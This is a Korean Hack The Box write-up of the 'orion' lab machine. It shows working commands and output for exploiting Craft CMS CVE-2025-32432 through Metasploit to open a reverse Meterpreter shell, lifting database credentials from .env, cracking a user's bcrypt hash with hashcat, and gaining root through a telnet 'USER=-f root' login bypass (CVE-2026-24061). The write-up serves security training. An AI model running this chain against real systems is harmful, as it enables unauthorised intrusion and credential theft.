▌ TRANSMISSION · [HTB]

[EASY_Linux] orion write-up


(STAFF Pick으로 지정되었길래 풀어보기로 했다!)

alt text

우선 주어진 IP를 대상으로 포트 스캐닝을 진행하여 열린 포트와 서비스를 식별해봤다.

  ~ sudo nmap 10.129.27.115 -sV -sC -p 80,22 -T4
Starting Nmap 7.98 ( https://nmap.org ) at 2026-07-08 10:20 +0900
Nmap scan report for 10.129.27.115
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://orion.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.08 seconds

확인 결과 22, 80 포트가 열려있는 것을 발견했고, http 서비스의 경우 http://orion.htb 도메인으로 리다이렉션 시키는 것도 확인할 수 있었다.

hosts 파일에 ip와 domain 등록 후, 웹서비스부터 분석을 시작했다.

alt text

접속해보니 orion telecom이라는 페이지로 이동되고, 네트워크 서비스를 제공하는 업체의 소개 페이지인 것 같다.

wapplyzer 확장 프로그램으로 페이지에서 얻을 수 있는 정보들을 수집에 보니

alt text

Craft CMS 라는 것을 사용하고 있었다. (페이지 footer 영역에서도 확인 가능)

해당 Craft CMS를 먼저 건드려보고 싶은데, 버전을 모르니 조금 더 탐색해보기로 했다.

바로 gobuster로 Directory Busting을 돌려볼까 하다가, 보통 admin이라는 이름의 페이지로 관리자 페이지가 존재하는 경우가 있기에 그냥 게싱으로 도전해봤다.

alt text

(야르~)

운좋게, 바로 admin page를 찾았다.

버전 또한 알 수 있었다.

  • Craft CMS version : 5.6.16

간단하게 Craft CMS가 뭔지도 찾아봤다.

Craft CMS

orion.htb 서비스에 사용된 Craft CMS의 버전은 가장 최신 버전과 비교했을 때 상대적으로 낮은 버전을 이용하고 있어 알려진 취약점이 존재에 대해 의심해볼 수 있다.

검색해보면

alt text

CVE-2025-32432 를 찾을 수 있다.

CVE-2025-32432

  • https://nvd.nist.gov/vuln/detail/CVE-2025-32432
    • 기본 내장된 이미지 변환(Image Transform) 생성 기능에서 발생하는 안전하지 않은 역직렬화(Insecure Deserialization) 결함으로 발생하는 취약점
    • 5.6.17 미만 버전에서 발생하는 취약점으로, 최종적으로 RCE까지 이어질 수 있다.

이번 문제는 Metasploit framwork를 사용해보고 싶어서, 이걸 사용해보기로 했다.

Metasploit Framwork

  • 알려진 취약점 exploit, payload, scanner, post-esploitation 기능을 모아둔 침투테스트용 자동화 도구
  • 주의 : 너무 의존하면 취약점 원리 이해 없이 딸깍충이 될 수 있음!!!!!

kali는 기본적으로 해당 프로그램이 들어있기 때문에 바로 msfconsole로 실행할 수 있다.

하지만 난 ubuntu 환경이기에 설치를 먼저 진행해주었다.

sudo apt update
sudo apt install -y curl gnupg2

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

그리고 실행해보면

  tools msfconsole
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
Metasploit tip: When in a module, use back to go back to the top level
prompt

               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:
                                :::::::+:
                      Metasploit

       =[ metasploit v6.4.135-dev-                              ]
+ -- --=[ 2,653 exploits - 1,338 auxiliary - 2,141 payloads     ]
+ -- --=[ 432 post - 49 encoders - 14 nops - 12 evasion         ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

msf >

요로코롬 실행된다.

(상세한 명령어라던가 사용법은 길게 다루지 않고 문제를 푸는데 필요한 것만 정리하였음)

  • search <검색어> : 모듈을 찾는 명령이다. CVE, 제품명, 취약점 이름으로 exploit / scanner / auxiliary 모듈을 검색할 때 사용한다.
msf > search cve-2025-32432

Matching Modules
================

   #  Name                                                    Disclosure Date  Rank       Check  Description
   -  ----                                                    ---------------  ----       -----  -----------
   0  exploit/linux/http/craftcms_preauth_rce_cve_2025_32432  2025-04-14       excellent  Yes    Craft CMS Image Transform Preauth RCE (CVE-2025-32432)
   1    \_ target: PHP In-Memory                              .                .          .      .
   2    \_ target: Unix/Linux Command Shell                   .                .          .      .


Interact with a module by name or index. For example info 2, use 2 or use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432
After interacting with a module you can manually set a TARGET with set TARGET 'Unix/Linux Command Shell'

0번이 우리가 찾는 모듈이니 이를 사용해보자.

  • use <모듈이름 또는 모듈번호> : 해당 모듈을 사용한다.
msf > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) >

(쉘 표기가 바뀌었는지 확인!)

이 모듈을 사용하기 위해 어떤 옵션이 필요한지를 확인해보자.

  • show options : 모듈에서 사용가능한 또는 필요로하는 옵션들을 확인한다.
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > options

Module options (exploit/linux/http/craftcms_preauth_rce_cve_2025_32432):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ASSET_ID  216              yes       Existing asset ID
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h,
                                         http
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  121.145.91.109   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP In-Memory



View the full module info with the info, or info -d command.

Required 칼럼이 yes라는 건, 모듈을 사용할 때 필수적으로 설정이 되어야하는 옵션이라는 뜻이다.

Metasploit이 자동으로 설정해주기도 하지만, 잘못 설정되거나 비어있는 경우가 많으니 꼭 확인해주자!

  • ASSET_ID
  • RHOST
  • RPORT
  • LHOST
  • LPORT

여거서 R은 Remote로 Target 정보를 입력하면 되고, L은 Listen으로 Attacker 정보를 입력하면 된다.

옵션 설정은 set 명령으로 할 수 있다.

  • set <옵션명> <설정할 값>
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set RHOSTS orion.htb
RHOSTS => 10.129.27.116
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set LHOST 10.10.14.180
LHOST => 10.10.14.180
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set LPORT 1337
LPORT => 1337

(RPORT는 80으로 되어있길래 패스)

RHOST의 경우 ip주소를 적으면 가상 호스트로 떠있기 때문에 찾아가지를 못해서 오류가 뜬다. 그러니 리다이렉션 시켜주는 도메인을 적어주자. (hosts 파일에 등록 필수!)

그리고 다시 한 번 show options 명령으로 설정이 잘되었는지 확인해주자.

이제 모듈을 실행해보자.

실행은 exploit 명령으로 수행해볼 수 있다. (nc로 리스너를 열필요 없이 바로 연결해줘서 편하긴하다…)

msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit
[*] Started reverse TCP handler on 10.10.14.180:1337
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Leaked session.save_path: /var/lib/php/sessions
[+] The target is vulnerable. Session path leaked
[*] Injecting stub & triggering payload...
[*] Sending stage (45739 bytes) to 10.129.27.116
[*] Meterpreter session 1 opened (10.10.14.180:1337 -> 10.129.27.116:51968) at 2026-07-08 12:09:26 +0900

meterpreter >

그러면 meterpreter라는 쉘이 떨어진다.

  • Meterpreter : Metasploit에서 제공하는 고급 원격 쉘(payload)이다.
    • Metasploit ↔ Meterpreter agent ↔ 대상 시스템 형태를 가진다.

help 명령을 통해 도움말 확인이 가능하며, shell 명령을 사용하면 리눅스 쉘 접속이 가능하다.

meterpreter > shell
Process 1664 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

이렇게 초기 침투까지 진행하였다!!

script /dev/null -c /bin/bash 로 깔끔한 쉘을 다시 열어주고, 침투를 이어서 진행했다.

www-data@orion:~/html/craft/web$ ls /home
ls /home
adam

홈디렉터리에서 adam 이라는 유저를 확인할 수 있었고, 요 유저가 다음 목표인 것 같다.

디렉터리 하나 뒤로 이동해보면

www-data@orion:~/html/craft$ ls -al
ls -al
total 364
drwxrwxr-x  7 www-data www-data   4096 Mar  6 11:22 .
drwxr-xr-x  3 root     root       4096 Mar  6 11:19 ..
-rw-rw-r--  1 www-data www-data    718 Mar  6 11:24 .env
-rw-rw-r--  1 www-data www-data    411 Nov 18  2025 .env.example.dev
-rw-rw-r--  1 www-data www-data    623 Nov 18  2025 .env.example.production
-rw-rw-r--  1 www-data www-data    619 Nov 18  2025 .env.example.staging
-rw-rw-r--  1 www-data www-data     31 Nov 18  2025 .gitignore
-rw-rw-r--  1 www-data www-data    624 Nov 18  2025 bootstrap.php
-rw-rw-r--  1 www-data www-data    611 Mar  6 11:20 composer.json
-rw-rw-r--  1 www-data www-data 310507 Mar  6 11:20 composer.lock
drwxrwxr-x  4 www-data www-data   4096 Mar  6 11:26 config
-rwxr-xr-x  1 www-data www-data    309 Nov 18  2025 craft
drwxrwxr-x  5 www-data www-data   4096 Mar  6 11:24 storage
drwxrwxr-x  2 www-data www-data   4096 Mar 10 10:46 templates
drwxrwxr-x 49 www-data www-data   4096 Mar  6 11:20 vendor
drwxrwxr-x  4 www-data www-data   4096 Mar  7 15:31 web

엄청 중요해 보이는 파일들이 많이 보인다…ㅎ

  • .env 내용
www-data@orion:~/html/craft$ cat .env
cat .env
# Read about configuration, here:
# https://craftcms.com/docs/5.x/configure.html

# The application ID used to to uniquely store session and cache data, mutex locks, and more
CRAFT_APP_ID=CraftCMS--67912ad2-1f1b-4993-bfec-e64daa5c23ff

# The environment Craft is currently running in (dev, staging, production, etc.)
CRAFT_ENVIRONMENT=dev

# General settings
CRAFT_SECURITY_KEY=RRS86F6i2JQKdC6kfEI7frVxA47WVMx8
CRAFT_DEV_MODE=true
CRAFT_ALLOW_ADMIN_CHANGES=true
CRAFT_DISALLOW_ROBOTS=true
CRAFT_DB_DRIVER=mysql
CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PORT=3306
CRAFT_DB_DATABASE=orion
CRAFT_DB_USER=root
CRAFT_DB_PASSWORD=SuperSecureCraft123Pass!
CRAFT_DB_SCHEMA=
CRAFT_DB_TABLE_PREFIX=

PRIMARY_SITE_URL=http://orion.htb/

로컬에서 Mysql DB가 돌고 있나보다. DB 패스워드도 알아냈다!!

얻은 크리덴셜로 mysql에 접근해봤다.

www-data@orion:~/html/craft$ mysql -u root -p
mysql -u root -p
Enter password: SuperSecureCraft123Pass!

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 65
Server version: 10.6.23-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

오 접속이 잘 된다 ㅎㅎ

이제 DB를 탐색해보자!

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| orion              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.002 sec)

누가봐도 orion DB를 봐야할 것 같고,

alt text

테이블에 users도 보인다.

alt text

레이아웃이 좀 깨지긴 했지만(?) adam의 패스워드 해시값을 얻을 수 있었다!!

  • 얻은 해시값 : $2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS

해시 구조를 보면 bcrypt 계열임을 알 수 있다.

hashcat의 -m 3200 옵션으로 크랙을 바로 시도해봤는데,

$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS:darkangel

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/...LUg0lS
Time.Started.....: Wed Jul  8 13:11:46 2026 (13 secs)
Time.Estimated...: Wed Jul  8 13:11:59 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-72 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:       52 H/s (16.43ms) @ Accel:1 Loops:32 Thr:11 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 660/14344385 (0.00%)
Rejected.........: 0/660 (0.00%)
Restore.Point....: 440/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:8160-8192
Candidate.Engine.: Device Generator
Candidates.#01...: rockon -> cheyenne
Hardware.Mon.#01.: Temp: 50c Fan: 35% Util:100% Core:2010MHz Mem:6801MHz Bus:8

Started: Wed Jul  8 13:11:42 2026
Stopped: Wed Jul  8 13:12:00 2026

크랙에 성공하여 adam의 패스워드 값인 darkangel를 얻을 수 있었다!

이걸로 ssh 접속에 성공할 수 있었다.

  ~ ssh adam@orion.htb
adam@orion.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-177-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Wed Jul  8 04:15:21 AM UTC 2026

  System load:  0.0               Processes:             228
  Usage of /:   77.6% of 5.81GB   Users logged in:       0
  Memory usage: 9%                IPv4 address for eth0: 10.129.27.116
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

adam@orion:~$

User Flag

adam@orion:~$ cat user.txt
a3c1************************4410

이제 권한 상승할 방법을 찾아보자.

  • sudo -l : 불가
  • env : 딱히 볼게 없음
  • idgroups : 뭐 없음…

다음으로 ss -tnlp 명령으로 현재 서버에서 어떤 TCP 포트가 열려있는지, 어떤 프로세스가 그 포트를 쓰는지를 확인해봤다.

alt text

이거 보고 그냥 넘어갈 뻔 했는데, 23번 포트에서 돌고 있는 서비스를 하나 발견했다.

내가 알기로는 Telnet 기본 포트인데, Telnet은 취약한 점이 많다고 들어서 요 녀석을 공략해보는건가 싶었다.

telnet 버전을 확인해보니

adam@orion:~$ telnet --version
telnet (GNU inetutils) 2.7
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.

2.7이었다.

요거에 알려진 취약점이 있나 보니

alt text

CVE-2026-24061 을 찾을 수 있었다.

CVE-2026-24061

PoC도 너무나 간단했는데,

USER 환경 변수를 -f root로 설정한다.

여기서 -f 옵션은 /bin/login에서 이미 인증된 사용자로 간주하고 비밀번호 검증을 생략하도록 하는 옵션이다. (Injection 같은 느낌스~?)

그리고 그냥 telnet 서비스에 접속하면 된다.

adam@orion:~$ USER='-f root' telnet -a localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 5.15.0-177-generic (orion) (pts/2)

Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-177-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Wed Jul  8 04:35:18 AM UTC 2026

  System load:  0.04              Processes:             232
  Usage of /:   77.6% of 5.81GB   Users logged in:       1
  Memory usage: 9%                IPv4 address for eth0: 10.129.27.116
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


root@orion:~# id
uid=0(root) gid=0(root) groups=0(root)
root@orion:~#

그러면 요렇게 권한상승에 성공하여 root shell을 획득할 수 있다!

Root Flag

root@orion:~# cat /root/root.txt
0f4d************************e602

← ALL POSTS